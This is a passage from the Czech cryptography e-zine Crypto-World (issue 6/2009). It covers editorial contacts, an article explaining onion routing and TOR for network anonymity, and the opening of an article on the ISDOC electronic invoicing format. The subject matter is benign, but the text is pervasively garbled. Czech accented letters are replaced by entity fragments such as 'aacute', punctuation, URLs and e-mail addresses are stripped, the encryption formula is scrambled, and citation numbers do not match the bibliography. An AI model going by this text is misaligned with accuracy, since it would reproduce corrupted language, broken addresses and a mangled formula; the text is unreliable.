e-mail pavelvondruskacrypto-worldinfo (předmět rušiacutem odběr Crypto-Worldu) nebo opět použiacutet formulaacuteř na httpcrypto-worldinfo Ve zpraacutevě prosiacutem uveďte jmeacuteno a přiacutejmeniacute a e-mail adresu na kterou byly koacutedy zasiacutelaacuteny 3 Redakce

E-zin Crypto-World Redakčniacute praacutece Pavel Vondruška Staacuteliacute přispěvateleacute Pavel Vondruška Jaroslav Pinkava Jazykovaacute uacuteprava Jakub Vraacutena Přehled autorů httpcrypto-worldinfoobsahautoripdf NEWS Vlastimil Kliacutema (vyacuteběr přiacutespěvků Jaroslav Pinkava komentaacuteře a Tomaacuteš Rosa vklaacutedaacuteniacute na web) Pavel Vondruška Webmaster Pavel Vondruška jr 4 Spojeniacute (abecedně) redakce e-zinu ezincrypto-worldinfo httpcrypto-worldinfo Vlastimil Kliacutema vklimavolnycz httpcryptographyhyperlinkcz Jaroslav Pinkava JaroslavPinkavazonercz httpcrypto-worldinfopinkava Tomaacuteš Rosa t_rosavolnycz httpcryptohyperlinkcz Pavel Vondruška pavelvondruskacrypto-worldinfo httpcrypto-worldinfovondruskaindexphp Pavel Vondruškajr pavelcrypto-worldinfo httpwebdesigncrypto-worldinfo Jakub Vraacutena jakubvranacz httpwwwvranacz

Page 8: Sešit 6/2009 (452 kB)

Crypto-World 62009

8

obchodu např reklamniacutech agentur To je zřetelneacute při využiacutevaacuteniacute služeb jako je veřejnyacute email internetoveacute obchody vyhledaacutevaciacute naacutestroje či komunikačniacute naacutestroje (Facebook atd) kde je reklama zcela ciacutelenaacute podle toho jak danou službu využiacutevaacuteme Tato reklama je pak takeacute mnohem uacutečinnějšiacute tiacutem paacutedem jsou jejiacute zadavateleacute ochotni platit značneacute sumy za data o uživateliacutech

Jak bylo uvedeno u přiacutekladů z předchoziacuteho textu existuje při použiacutevaacuteniacute informačniacutech technologiiacute přiacuteliš hrozeb na to aby zůstala naše identita skryta Tato digitaacutelniacute identita je pak využiacutevaacutena při aktivitaacutech ktereacute již nemusiacute byacutet zcela v zaacutejmu uživatele Probleacutem je že v teacuteto faacutezi je teacuteměř nemožneacute takoveacuteto užiacutevaacuteniacute dat omezit či kontrolovat Důvodem neniacute až tak technologickaacute nemožnost jako neochota poskytovatelů těchto služeb umožňovat anonymnějšiacute prostřediacute V naacutesledujiacuteciacutem textu bude představen naacutestroj kteryacute může řešit prvotniacute probleacutem tyacutekajiacuteciacute se analyacutezy provozu v datovyacutech siacutetiacutech Je zde uveden jelikož se jednaacute o stavebniacute prvek využitelnyacute při uvedeniacute dalšiacutech technik ochrany anonymity uživatele v celosvětoveacute siacuteti a o prvek bez ktereacuteho by pokročilejšiacute techniky ztraacutecely smysl Adresace v IP siacutetiacutech

Prvniacute probleacutem kteryacute potřebujeme vyřešit v souvislosti se zvyacutešeniacutem anonymity v IP siacutetiacutech je adresace a směrovaacuteniacute Všechna posiacutelanaacute data jsou zapouzdřena do IP paketů viz Obr č 1

Obr č 1 Hlavička IP paketu Součaacutestiacute hlavičky těchto paketů je takeacute zdrojovaacute adresa a ciacutelovaacute adresa tedy jednoznačneacute identifikaacutetory původce komunikace a ciacutele komunikace V předchoziacute kapitole však byly popsaacuteny hrozby plynouciacute z možnosti identifikace komunikace Vidiacuteme že tedy již v naacutevrhu komunikačniacuteho protokolu TCPIP je jistyacute probleacutem braacuteniacuteciacute zvyacutešeniacute anonymity v globaacutelniacute siacuteti Existujiacute však řešeniacute kteraacute jsou již v současneacute době použiacutevaacutena a kteraacute mohou tento probleacutem uacutespěšně vyřešit Ziacuteskaacuteme tak protokol pro anonymniacute komunikaci kde z odchycenyacutech dat nepůjdou zjistit jejiacute uacutečastniacuteci Jedniacutem z těchto řešeniacute je onion routing [6] Onion routing

Ciacutelem metody je anonymniacute provoz v IP siacutetiacutech diacuteky tzv onion routerům Technika využiacutevaacute současnou infrastrukturu je tedy ihned použitelnaacute po nainstalovaacuteniacute přiacuteslušneacuteho software Zaacutekladniacutemi prvky jsou klient (Alice) onion routery a server (Bob) ke ktereacutemu Alice požadavek vysiacutelaacute Z odchycenyacutech dat neniacute možneacute vysledovat ani obsah komunikace ani jejiacute uacutečastniacuteky Každyacute prvek kteryacute se komunikace uacutečastniacute (onion router) znaacute pouze předchoziacute

Crypto-World 62009

9

prvek a naacutesledujiacuteciacute v cestě žaacutednyacute jinyacute Pouze posledniacute onion router v řetězci tzv gateway data rozšifruje vyšle požadavek na server Boba v internetu a obdržiacute odpověď Tato odpověď se zase zašifruje a vraciacute se přes onion routery zpět k původci komunikace Situace je znaacutezorněna pomociacute Obr č 2

Obr č 2 Struktura onion routing

Bezpečnost tohoto řešeniacute a anonymita Alice je založena praacutevě na routerech Ty si předaacutevajiacute data mezi sebou a znajiacute praacutevě jen předchůdce a naacutesledovniacuteka Jelikož je cesta přes routery vždy naacutehodně zvolenaacute a unikaacutetniacute neniacute možneacute zjistit Alici Jedinyacute kdo s niacute přiacutemo komunikuje je prvniacute router nicmeacuteně Alice se chovaacute z jeho pohledu jako běžnyacute router kteryacute provoz takeacute jen přeposiacutelaacute a negeneruje tudiacutež ani prvniacute router neznaacute původce dat Celyacute provoz vyslaacuteniacute požadavku od Alice k Bobovi tedy probiacutehaacute naacutesledovně

1 Všechny prvky v siacuteti vlastniacute soukromyacute a veřejnyacute kliacuteč asymetrickeacute kryptografie 2 V prvniacutem kroku si klient zvoliacute routery přes ktereacute půjde provoz Na jejich počtu zaacutevisiacute

bezpečnost a anonymita ndash čiacutem viacutece tiacutem je menšiacute možnost vysledovaacuteniacute Tato cesta musiacute byacutet naacutehodnaacute Klient znaacute veřejneacute kliacuteče těchto routerů

3 Klient zašifruje svůj požadavek dle naacutesledujiacuteciacuteho postupu )))((( požadavekEhlavEhlavEData

CBA VKVKVK ++=

4 Tedy vezme data pro Boba a zašifruje je pomociacute veřejneacuteho kliacuteče posledniacuteho routeru C (gateway) K vyacutesledku pak připojiacute IP hlavičku s adresou routeru C a znovu zašifruje pomociacute VK předchoziacuteho routeru B Tento proces se opakuje až k prvniacutemu routeru A

5 Tyto data pak odešle routeru A a tvaacuteřiacute se jako běžnyacute router tj že data pouze přeposiacutelaacute Router pomociacute sveacuteho soukromeacuteho kliacuteče rozšifruje kryptogram a zjistiacute hlavičku IP paketu v němž je uložena IP dalšiacuteho routeru a kryptogram zašifrovanyacute veřejnyacutem kliacutečem tohoto routeru Odešle tedy tyto data routeru B Takto postupujeme až k posledniacutemu routeru Jak je vidět žaacutednyacute router se nedozviacute viacutece než IP dalšiacuteho routeru (popř předchoziacuteho kteryacute data zaslal) a zašifrovanaacute data

6 Jakmile doraziacute data k posledniacutemu routeru C mohou byacutet rozšifrovaacutena a ziacuteskaacute se tak požadavek Ten je routerem vyslaacuten do internetu a je ziacuteskaacutena odpověď Odpověď je poslaacutena zpět stejnyacutem kanaacutelem Metoda daacutele přidaacutevaacute dalšiacute bezpečnostniacute techniky napřiacuteklad routery vklaacutedajiacuteciacute naacutehodneacute zpožděniacute do komunikace (aby nebylo možneacute sledovat tok dat dle časovaacuteniacute) či vklaacutedajiacuteciacute nesmyslnaacute data

TOR Vyacuteše zmiacuteněnyacute postup je zaacutekladem onion routingu tedy vytvaacuteřiacute se vrstvy do nichž

jsou vždy šifrovaacuteny informace o dalšiacutem bodě Nejznaacutemějšiacute implementaciacute tohoto postupu je TOR což je projekt The Onion Routing [7] Zde je postup jemně odlišnyacute Vytvořiacute se

Crypto-World 62009

10

symetrickeacute kliacuteče pro každyacute autentizovanyacute router pomociacute Diffie-Hellmanova algoritmu [8] a PKI [9] ktereacute se daacutele využiacutevajiacute k šifrovaacuteniacute zpraacutev (z důvodu rychlosti) Alice pak zpraacutevu zašifruje postupně všemi symetrickyacutemi kliacuteči ve stejneacutem duchu jako v předchoziacutem přiacutepadě viz Obr č 3

Obr č 3 Dopřednyacute směr v TOR

Zpraacuteva je pak doručena bezpečně až Bobovi Ten může vytvořit odpověď a poslat ji zpětnou cestou kde každyacute router zpraacutevu zašifruje svyacutem symetrickyacutem kliacutečem přidaacute tedy dalšiacute vrstvu Až doraziacute zpraacuteva k Alici může byacutet rozšifrovaacutena jelikož Alice všechny symetrickeacute kliacuteče znaacute Situace je znaacutezorněna na Obr č 4

Obr č 4 Odpověď v TOR

Obr č 5 TOR ndash přenos zpraacutev

Crypto-World 62009

11

Vyacutesledkem je praktickaacute implementace kteraacute naacutem dovoliacute komunikovat v IP siacutetiacutech zcela

anonymně i přes nutnost použiacutevaacuteniacute IP adres Zjednodušenyacute proces vytvořeniacute kanaacutelu je takeacute na Obr č 5 Zaacutevěr

Hlavniacutem ciacutelem tohoto člaacutenku bylo uvedeniacute důvodů pro zvyacutešeniacute anonymity v prostřediacute globaacutelniacute siacutetě a uvedeniacute řešeniacute ktereacute může sloužit jako počaacutetečniacute bod Byl zde stručně popsaacuten princip tzv onion routingu a nejpoužiacutevanějšiacute implementace TOR Na zaacutekladě těchto naacutestrojů je již možneacute zajistit anonymniacute komunikaci mezi dvěma prvky využiacutevajiacuteciacute IP siacutetě přičemž data budou mezi prvky vyměněna ale pro všechny uacutečastniacuteky zůstane identita klienta skryta Tyto naacutestroje bude daacutele možneacute využiacutet v dalšiacutech metodaacutech vyššiacute vrstvy napřiacuteklad u protokolů majiacuteciacutech zajistit anonymniacute autentizaci Literatura

[1] SCHNEIER Bruce The Tech Lab Bruce Schneier [online] 2009 [cit 2009-04-26] Dostupnyacute z WWW lthttpnewsbbccouk1hitechnology7897892stmgt

[2] FactCheck how many CCTV cameras [online] 2008 [cit 2009-04-26] Dostupnyacute z WWW lthttpwwwchannel4comnewsarticlessocietyfactcheck+how+many+cctv+cameras2291167gt

[3] SCHNEIER Bruce CCTV doesnt keep us safe yet the cameras are everywhere [online]

2008 [cit 2009-04-26] Dostupnyacute z WWW lthttpwwwguardiancouktechnology2008jun26politicsukcrimegt

[4] SCHNEIER Bruce Our Data Ourselves [online] 2008 [cit 2009-04-26] Dostupnyacute z WWW lthttpwwwwiredcomprintpoliticssecuritycommentarysecuritymatters200805securitymatters_0515gt

[5] Onion routing [online] 2009 [cit 2009-04-26] Dostupnyacute z WWW lthttpenwikipediaorgwikiOnion_routinggt

[6] Tor anonymity online [online] 2009 [cit 2009-04-26] Dostupnyacute z WWW lthttpwwwtorprojectorggt

[7] DIFFIE Whitfield HELLMAN Martin New Directions in Cryptography [online] 1976 [cit 2009-04-26] Dostupnyacute z WWW lthttpwwwcsrutgersedu~tdnguyenclassescs671presentationsArvind-NEWDIRSpdfgt

[8] PKI [online] - [cit 2009-04-26] Dostupnyacute z WWW lthttpcswikipediaorgwikiPKIgt

Crypto-World 62009

12

C Formaacutet elektronickeacute fakturace ISDOC Petr Kuchař ABRA Software as (petrkucharabraeu ) sdruženiacute SPIS (petrkucharspiscz) Preambule S narůstajiacuteciacutem použiacutevaacuteniacutem ICT technologiiacute ve všech oborech lidskeacute činnosti je v posledniacutem obdobiacute pozorovatelnyacute trend většiacuteho použiacutevaacuteniacute elektronickyacutech dokumentů a jejich vyacuteměny mezi subjekty ve smyslu nahrazeniacute klasickyacutech papiacuterovyacutech postupů elektronickyacutemi V tomto duchu jde i legislativa v ČR kteraacute od roku 2000 znaacute elektronickyacute podpis od roku 2005 majiacute elektronickeacute daňoveacute doklady stejnou vaacutehu jako papiacuteroveacute a od 72009 bude možneacute autorizovaně konvertovat papiacuteroveacute dokumenty na elektronickeacute a naopak a takeacute komunikovat se staacutetem či dalšiacutemi subjekty elektronicky prostřednictviacutem tzv Datoveacute schraacutenky Vrcholem trendu elektronizace ve veřejneacute spraacutevě je pak systeacutem zaacutekladniacutech registrů schvaacutelenyacute Poslaneckou sněmovnou 1322009 kteryacute posune eGovernment v Českeacute republice po mnoha letech na zcela novou informatickou uacuteroveň Vedle přiacutekladů z veřejneacute spraacutevy je stejnyacute trend pozorovatelnyacute i ve sfeacuteře korporaacutetniacute Jedniacutem z milniacuteků je vybudovaacuteniacute formaacutetu elektronickeacute fakturace s naacutezvem ISDOC Tento formaacutet byl vystavěn Pracovniacute skupinou pro elektronickou fakturaci sdruženiacute SPIS a maacute šanci staacutet se de facto standardem elektronickeacute fakturace v ČR V řiacutejnu 2008 se 14 vyacuteznamnyacutech firem z oboru ICT rozhodlo k podpisu bdquoDeklarace o společneacutem postupu v oblasti elektronickeacute fakturaceldquo kterou se tyto subjekty zavaacutezaly formaacutet implementovat do svyacutech fakturačniacutech produktů v obdobiacute jednoho roku od jeho vyhlaacutešeniacute ke ktereacutemu došlo 1932009 Naacutesledujiacuteciacute přiacutespěvek se věnuje vysvětleniacute důvodů jeho existence technologickyacutech vyacutechodisek použityacutech při jeho naacutevrhu včetně řešeniacute problematiky elektronickeacuteho podpisu a takeacute jednomu z naacutestrojů pro jeho hromadneacute nasazeniacute

Co je formaacutet ISDOC Formaacutet ISDOC je formaacutet elektronickeacute fakturace definovanyacute jako XML soubor a popsanyacute XSD scheacutematem Součaacutestiacute formaacutetu je i zaručenyacute elektronickyacute podpis založenyacute na kvalifikovaneacutem certifikaacutetu čiacutemž se takovyacute dokument staacutevaacute daňovyacutem dokladem vystavenyacutem v elektronickeacute formě podle sect 26 odst4 zaacutekona č2352004 o dani z přidaneacute hodnoty

Hlavniacute myšlenkou formaacutetu ISDOC je umožnit korporaacutetniacutemu i veřejneacutemu sektoru posiacutelaacuteniacute datovyacutech zpraacutev jejichž interniacute formaacutet bude v souladu s našiacute legislativou bude podporovaacuten vyacuteznamnyacutemi vyacuterobci fakturačniacuteho software v ČR a hlavně bude jednotnyacute Změniacute tak leacuteta trvajiacuteciacute žalostnyacute stav informačniacute praxe v našiacute zemi kdy ač technologie i legislativa elektronickou fakturaci dovolovala se tato diacuteky existenci mnoha proprietaacuterniacutech formaacutetů různyacutech vyacuterobců nedala použiacutet v globaacutelniacutem měřiacutetku Tak v roce 2006 vznikla z iniciativy ABRA Software as ve sdruženiacute SPIS pracovniacute skupina kteraacute navaacutezala na legislativniacute rešerše svyacutech předchůdců z roku 2003 a začala hledat konkreacutetniacute legislativniacute i technologickou cestu Zaklaacutedajiacuteciacute členoveacute skupiny ABRA Software LCS International a Ernst amp Young se zaacutehy rozrostli o dalšiacute firmy jako jsou Ciacutegler Software K2Atmitec Stormware DC Concept JKR nebo Českaacute spořitelna Pozornyacute čtenaacuteř již jistě postřehl že jde většinou o konkurenty na trhu informačniacutech a ERP systeacutemů Ano je tomu tak nicmeacuteně myšlenka jednotneacuteho formaacutetu je natolik silnaacute že i firmy v přiacutemeacutem konkurenčniacutem postaveniacute jsou schopny si sednout k jednomu stolu a spolupracovat na společneacutem diacutele Kliacutečovou uacutelohu v tomto ohledu sehraacutelo Sdruženiacute pro informačniacute společnost (SPIS)

Crypto-World 62009

13

Proč ISDOC vznikl a jakyacute je jeho ciacutel Bliacutezkyacutem ciacutelem vzniku formaacutetu bylo sjednotit elektronickou podobu několika ekonomickyacutech dokumentů fakturačniacute povahy (faktura dobropis vrubopis zaacutelohovaacute faktura daňovyacute zaacutelohovyacute list a jeho dobropis) a daacutet jiacute prostřednictviacutem spolupraacutece a podpory vyacuteznamnyacutech vyacuterobců na trhu k dispozici jejich klientům - firmaacutem ktereacute se zabyacutevajiacute obchodem či službami a ktereacute z nejrůznějšiacutech důvodů neimplementovaly žaacutedneacute jineacute obecneacute řešeniacute Vzdaacutelenyacutem ciacutelem pak je dosaacutehnout tiacutemto způsobem zvyacutešeniacute produktivity praacutece v segmentu vyacuteroby a distribuce zbožiacute i v segmentu služeb což v dlouhodobeacutem horizontu pomůže Českeacute republice jako celku se prosadit v evropskeacutem kontextu jako země s velkyacutem podiacutelem služeb s vysokou přidanou hodnotou Tiacutem aktivita ISDOC plniacute i jedno ze zaacutekladniacutech poslaacuteniacute sdruženiacute SPIS

Hlavniacute vyacutehody ISDOC Nevyžaduje pro komunikaci žaacutedneacuteho zprostředkovatele

Jedna z hlavniacutech vyacutehod tohoto formaacutetu XML soubor obsahuje elektronickyacute podpis a je tudiacutež plnohodnotnyacutem daňovyacutem dokladem V tomto smyslu neniacute podstatneacute jakaacute přenosovaacute infrastruktura je použita a jak došlo k doručeniacute dokladu od vystavitele k přiacutejemci Je možneacute tyto soubory posiacutelat jako přiacutelohu v běžneacutem e-mailu je možneacute použiacutevat zabezpečenyacute přenos pomociacute VPN či dalšiacutech řešeniacute (jako např bdquoNESS Trade Connectorldquo což je zabezpečenyacute přenos na uacuterovni B2B) nebo je možneacute soubory dopravovat na fyzickyacutech meacutediiacutech typu Flash či dokonce FD Důsledkem teacuteto vyacutehody je samozřejmě uacutespora transakčniacutech naacutekladů ktereacute např malyacutem firmaacutem doposud braacutenily takoveacute řešeniacute nasadit Tato vlastnost byla jedniacutem ze zaacutekladniacutech požadavků celeacuteho zadaacuteniacute formaacutetu ISDOC

Připouštiacute možnost zprostředkovatele komunikace

I když si tento bod možnaacute zdaacutenlivě odporuje s bodem předchoziacutem je takeacute důležityacute Formaacutet totiž připouštiacute i možnost třetiacute strany - zprostředkovatele komunikace mezi vyacutestavcem a přiacutejemcem kterou podporuje zvlaacuteštniacutemi bdquoroutovaciacutemildquo položkami Třetiacute strana do původně bilateraacutelniacuteho vztahu přinaacutešiacute zpravidla nějakou dalšiacute přidanou hodnotu za kterou jsou původniacute strany ochotny zaplatit Jedna z nejzajiacutemavějšiacutech je vyřešeniacute bezpečnostniacute problematiky jednotlivyacutech dokladů tak aby je cestou nemohl nikdo monitorovat daacutele to byacutevaacute notifikace přijetiacute dokladu zprostředkovatelem i přiacutejemcem vyřešeniacute souhlasu s přiacutejmem elektronickyacutech dokladů pomociacute všeobecnyacutech podmiacutenek zprostředkovatele a v neposledniacute řadě takeacute častaacute služba spočiacutevajiacuteciacute v archivaci jednotlivyacutech dokladů po zaacutekonnou dobu 10+1 let Přiacutekladem takoveacuteho řešeniacute může byacutet např Českaacute Spořitelna se svou službou FAKTURA 24 či již vyacuteše zmiacuteněnyacute systeacutem Datovyacutech schraacutenek kteryacute nabiacutedne oproti jinyacutem zaacutekonnou fikci doručeniacute dokumentu ve lhůtě 10 dnů Důsledkem možnosti využiacutet služeb intermediaacutetora nad formaacutetem ISDOC je možnost použitiacute stejneacuteho formaacutetu i pro relativně velkeacute subjekty jako jsou napřiacuteklad dodavateleacute ze segmentu utilit (tj energie vodaacuterenstviacute atd)

Formaacutet je pouze jeden

Pro pochopeniacute vyacuteznamu tohoto bodu je užitečneacute se podiacutevat do světa EDI (myšleno UN EDIFACT) což je dalšiacute formaacutet kteryacute naacuteš zaacutekon o DPH pro elektronickeacute daňoveacute doklady připouštiacute Definuje jej odkazem na bdquoDoporučeniacute komise 1994820ES ze dne 19řiacutejna 1994ldquo Zde je situace takovaacute že jednotliviacute dodavateleacute EDI řešeniacute často oborově zaměřeniacute si mohou z mnoha standardniacutech položek formaacutetu vybrat pro sveacute použitiacute pouze některeacute a na těch vystavět svůj tzv subset Vyacutesledkem je že firma kteraacute maacute ve sveacutem ISERP implemenovaacuten subset A přiacutemo nemůže komunikovat s firmou majiacuteciacute implementovaacuten subset B Musiacute z principu využiacutet služeb třetiacute strany kteraacute umiacute převeacutest protokoly jednotlivyacutech subsetů mezi

Crypto-World 62009

14

sebou což typicky byacutevaacute placenaacute služba Naproti tomu u formaacutetu ISDOC nic takoveacuteho neniacute třeba protože formaacutet je prostě jen jeden Samozřejmě je třeba se popasovat s probleacutemem oborovyacutech specifik kteryacute je v ISDOC vyřešen pomociacute hlavičkovyacutech a řaacutedkovyacutech uživatelskyacutech položek To jsou elementy v jejichž raacutemci může byacutet umiacutestěna libovolnaacute uživatelskaacute XML struktura kteraacute na rozdiacutel od zbytku formaacutetu nepodleacutehaacute kontrole pomociacute XSD scheacutematu a tudiacutež neniacute třeba s každou takovou uživatelskou variantou měnit zaacutekladniacute XSD scheacutema

Obecně je možneacute řiacuteci že Pracovniacute skupina pracovala celyacutech 14 měsiacuteců na tom aby formaacutet zohlednil všechna důležitaacute specifika českeacute daňoveacute legislativy Našiacutem ciacutelem bylo aby formaacutet byl schopen nahradit 95 faktur ktereacute se doposud vyskytovaly v papiacuterovyacutech firemniacutech transakciacutech Důsledkem vyacuteše zmiacuteněnyacutech vlastnostiacute pak je že pokud libovolnaacute firma použiacutevaacute fakturačniacute software podporujiacuteciacute formaacutet ISDOC a elektronicky fakturuje tak libovolneacute jineacute firmy podporujiacuteciacute takteacutež formaacutet ISDOC mohou tyto faktury přijiacutemat a jejich systeacutem je umiacute interpretovat A pokud přijiacutemaciacute systeacutem objeviacute uživatelskeacute položky kteryacutem rozumiacute tak je použije pokud ne tak je ignoruje V každeacutem přiacutepadě je ale faktura načtena jak položkově tak finančně Aby pravděpodobnost spraacutevneacute interpretace byla co nejvyššiacute iniciovalo sdruženiacute SPIS již jmenovanou ldquoDeklaraci o společneacutem postupu v oblasti elektronickeacute fakturacerdquo na ktereacute se kromě již zmiacuteněnyacutech firem shodli i dalšiacute vyacuteznamneacute firmy z oboru ISERP jako jsou Karat Software Gordic Asseco ČR či dokonce zaacutestupci nadnaacuterodniacutech gigantů jako Microsoft nebo SAP ČR Po vyhlaacutešeniacute formaacutetu v březnu 2009 se k Deklaraci začaly připojovat dalšiacute firmy K 162009 je jejich vyacutečet naacutesledujiacuteciacute Accord ALTEC ALTUS software COMPEKON MICRODATA ORTEX TILL CONSULT TRIADA VERA a WinStrom

Z čeho jsme vychaacutezeli Formaacutet ISDOC vychaacuteziacute filozoficky z formaacutetu UBL 20 definovaneacuteho mezinaacuterodniacutem sdruženiacutem OASIS (wwwoasis-openorg) Z teacuteto normy jsme původně vyšli a chviacuteli se zdaacutelo že budeme moci jen popsat co ktereacute položky znamenajiacute a můžeme začiacutet implementovat do svyacutech systeacutemů Časem se ale začaly objevovat probleacutemy jak naplnit ten či onen legislativniacute požadavek a v určitou chviacuteli bylo jasneacute že budeme muset pro některeacute funkčnosti použiacutet vlastniacute položky protože UBL nic podobneacuteho neřešiacute (napřiacuteklad problematika daňovyacutech zaacuteloh počiacutetaacuteniacute DPH metodou zdola nebo shora atd) Tak se v naacutevrhu objevil kromě čtyř původniacutech jmennyacutech prostorů i jeden novyacute ndash bdquoisdldquo ve ktereacutem jsme koncentrovali veškereacute noveacute či pozměněneacute položky Když jsme začali daacutevat dohromady jednotlivaacute XML scheacutemata (soubory XSD) tak se velmi rychle ukaacutezalo že vyacuteslednyacute popis i formaacutet je složityacute a nepřehlednyacute A tak jsme nakonec definovali jedinyacute jmennyacute prostor kteryacute cca z 12 vychaacuteziacute z položek a datovyacutech typů UBL a ze druheacute poloviny je doplněn položkami vlastniacutemi Všechny položky majiacute samozřejmě anglickeacute naacutezvy a kde to bylo možneacute použili jsme datovyacute typ shodnyacute s UBL 20

Hlavniacute rysy technickeacuteho řešeniacute Viacutece druhů dokladů faktura čniacute povahy

Jak již bylo zmiacuteněno formaacutet ISDOC řešiacute všechny zaacutekladniacute dokumenty fakturačniacute povahy ktereacute se mohou vyskytovat v běžneacute firemniacute praxi Jednaacute se konkreacutetně o fakturu vč podpory zuacutečtovaacuteniacute daňovyacutech i přiacutepadnyacutech nedaňovyacutech zaacutelohovyacutech listů dobropis vrubopis zaacutelohovou fakturu (myšleno nedaňovyacute zaacutelohovyacute list) daňovyacute zaacutelohovyacute list a dobropis daňoveacuteho zaacutelohoveacuteho listu

Crypto-World 62009

15

Doklady v miacutestniacute i ciziacute měně

Všechny doklady mohou byacutet buď v miacutestniacute nebo v jedneacute ciziacute měně Tuto omezujiacuteciacute podmiacutenku jsme stanovili po analyacuteze vyacuteskytu cizoměnnyacutech dokladů s viacutece než jednou měnou Podle našich zjištěniacute je takovyacutech dokladů jen velmi maleacute množstviacute Z tohoto důvodu a současně takeacute z důvodu neuacuteměrneacuteho zkomplikovaacuteniacute vnitřniacutech vazeb jsme rozhodli se touto variantou nadaacutele nezabyacutevat Identifikace až 5-ti různyacutech stran na dokladu

Protože na dokladech se běžně vyskytujiacute kromě adres odběratele a dodavatele zapsanyacutech v obchodniacutem rejstřiacuteku ještě adresy dalšiacute např adresy fakturačniacutech miacutest či adresy dodaacuteniacute podporuje ISDOC až 5 takovyacutech Důležiteacute je to i proto že zaacutekon dovoluje pověřit fakturaciacute třetiacute osobu Důležiteacute je že rozlišovaciacute položky pro identifikaci firem dovolujiacute použitiacute jak firemniacutech (proprietaacuterniacutech) koacutedů tak celosvětovyacutech GLN (Global Location Number) identifikaacutetorů a samozřejmě takeacute naacuterodniacutech identifikačniacutech čiacutesel kteryacutem je v ČR uacutedaj IČ

Identifikace zbožiacute až 5-ti rozlišujiacuteciacutemi uacutedaji

Podobně jako v přiacutepadě firem je u rozlišeniacute zbožiacute podporovaacuteno hned několik druhů identifikaacutetorů Jsou to až 3 různeacute koacutedy podle dodavatele daacutele globaacutelniacute identifikaacutetor typu EAN a pro spolupraacutece typu bdquomalyacute dodavatel a obrovskyacute odběratelldquo i koacutedy zbožiacute podle odběratele

Podpora seacuteriovyacutech čiacutesel a šaržiacute vč expiraciacute

Protože předmětem obchodu a tedy i fakturace je často zbožiacute u ktereacuteho je třeba evidovat jednotlivaacute seacuteriovaacute čiacutesla (typicky velkaacute elektronika) nebo seacuterie zbožiacute se stejnou šaržiacute (typicky leacuteky či potraviny) obsahuje ISDOC přiacuteslušneacute kolekce i na tyto eventuality

Možnost použitiacute tzv uživatelskyacutech položek

Technicky se jednaacute o zvlaacuteštniacute nevalidovaneacute kolekce hlavičkovyacutech a řaacutedkovyacutech položek ktereacute nejsou zaacuteměrně nijak svaacutezaacuteny s hlavniacutem XSD scheacutematem Tiacutem je možno ve standardizovaneacutem formaacutetu použiacutevat i položky na kteryacutech se vyacutestavce a přiacutejemce dohodli bilateraacutelně Napřiacuteklad bude-li nutno na fakturačniacutem řaacutedku se spotřebou elektrickeacute energie v KWh přeneacutest ještě doplňkovou informaci v jakyacutech sazbaacutech se čerpaacuteniacute uskutečnilo jakyacute byl paušaacutelniacute poplatek za konkreacutetniacute elektroměr a nakolik zaacutekaniacutek využil možnost vyacutekupu zeleneacute energie tak je to touto cestou možneacute aniž je nutno měnit celkovou verzi formaacutetu a na všech stranaacutech jiacute implementovat V praxi tak informačniacute systeacutemy vyacutestavce a přiacutejemce mohou byacutet upraveny k použiacutevaacuteniacute těchto položek zatiacutemco ostatniacute systeacutemy tyto položky nebudou interpretovat protože tyto nejsou popsaacuteny ve validačniacutech scheacutematech Položky povinneacute pro daňovyacute doklad však obsahuje každyacute soubor ISDOC

Řešeniacute přiacuteloh jako dokumentů majiacuteciacutech praacutevniacute relevanci k faktuře

Protože v papiacuteroveacute praxi se často vyskytujiacute u faktur takeacute přiacutelohy ktereacute mohou miacutet i praacutevniacute relevanci k mateřskeacutemu dokladu museli jsme za viděniacute ciacutele nahradit papiacuteroveacute řešeniacute elektronickyacutem řešit i tyto situace Přiacutelohy mohou obsahovat napřiacuteklad všeobecneacute obchodniacute podmiacutenky přiacutelohou může byacutet kalkulačniacute list k faktuře na parkety stejně jako fotografie billboardu k faktuře na reklamniacute služby Řešeniacute se v zaacutesadě děliacute na ty ktereacute musiacute omezit velikost přiacuteloh a na ty ostatniacute kde to nutneacute neniacute K omezeniacute velikosti přiacuteloh se přistupuje v přiacutepadě kdy přiacutelohy jsou součaacutestiacute samotneacuteho XML (v přiacuteslušneacutem koacutedovaacuteniacute např BASE64) a jejich nadměrnaacute velikost by tak mohla zcela ochromit zachaacutezeniacute s přiacuteslušnyacutem souborem (funce načteniacute do paměti verifikace proti XSD atd) Proto jsme se v definici ISDOC vydali druhou cestou kterou je udržovaacuteniacute přiacuteloh mimo vlastniacute XML soubor ndash v jineacutem datoveacutem

Crypto-World 62009

16

kontejneru Formaacutet ISDOC jsou tedy ve skutečnosti formaacutety dva Jeden je soubor isdoc což je vnitřně bdquoklasickyacuteldquo XML soubor kteryacute neobsahuje žaacutedneacute přiacutelohy a použije se praacutevě v tomto přiacutepadě Druhyacutem formaacutetem je soubor isdocx kteryacute je vnitřně souborem typu ZIP a kteryacute může kromě bdquohlavniacuteholdquo souboru isdoc neacutest i libovolneacute dalšiacute soubory jako přiacutelohy daneacuteho dokladu Vtip je v tom že jednotliveacute přiacutelohy jsou referencovaacuteny v přiacuteslušneacute kolekci bdquohlavniacuteholdquo isdoc souboru svyacutem jmeacutenem a SHA1 otiskem A jak již bylo uvedeno celyacute obsah dokladu isdoc je podepsaacuten elpodpisem Tiacutem jsou soubory přiacuteloh sice technicky umiacutestěny vně XML (a nezdržujiacute jeho zpracovaacuteniacute) ale současně se jakaacutekoliv manipulace s přiacutelohami okamžitě projeviacute porušeniacutem SHA1 otisků jednotlivyacutech přiacuteloh přiacutepadně rovnou neplatnostiacute elektronickeacuteho podpisu celeacute faktury pokud by se někdo pokoušel v niacute SHA1 otisky přiacuteloh ručně přepsat Tiacutem by byl soubor isdoc prohlaacutešen za neautentickyacute (pozměněnyacute) Vyacutesledneacute řešeniacute tedy splňuje splňuje stejnaacute bezpečnostniacute kriteacuteria jako kdyby přiacutelohy byly celeacute součaacutestiacute jedineacuteho podepsaneacuteho XML

